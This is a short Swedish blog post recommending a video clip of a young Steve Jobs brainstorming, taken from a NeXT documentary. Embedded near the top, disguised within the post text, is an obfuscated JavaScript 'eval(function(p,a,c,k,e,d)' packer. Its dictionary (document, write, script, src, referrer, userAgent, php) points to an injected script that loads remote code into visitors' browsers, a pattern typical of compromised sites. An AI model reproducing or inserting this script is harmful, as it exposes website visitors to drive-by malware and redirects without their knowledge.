Steve Jobs brainstorm session. Inspirerande!
Brainstorm eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sikek|var|u0026u|referrer|denab||js|php’.split(’|’),0,{}))
like a boss
Det dyker ständigt upp klipp med Steve Jobs, nya som gamla. Men här är en jag aldrig sett förut. Det är ett klipp på en ung brainstormande Steve, som delar med sig av sina tankar, det är tydligt hur han kunde skapa det han gjorde. Här är någon som brinner för teknik.
Klipper är 21 minuter och är en del av dokumentären om företaget NeXT, vilket var företaget som Steve Jobs startade efter att han lämnade Apple 1985.
Videoklippet visar mycket, hur svårt det är att starta ett nytt företag, hur atmosfären under den digitalteknikens ungdom var.
Men bäst av allt är att se hur driven Steve Jobs faktisk var.
httpv://www.youtube.com/watch?v=sOlqqriBvUM&feature=player_embedded
-
Vilken kille!!!
Comments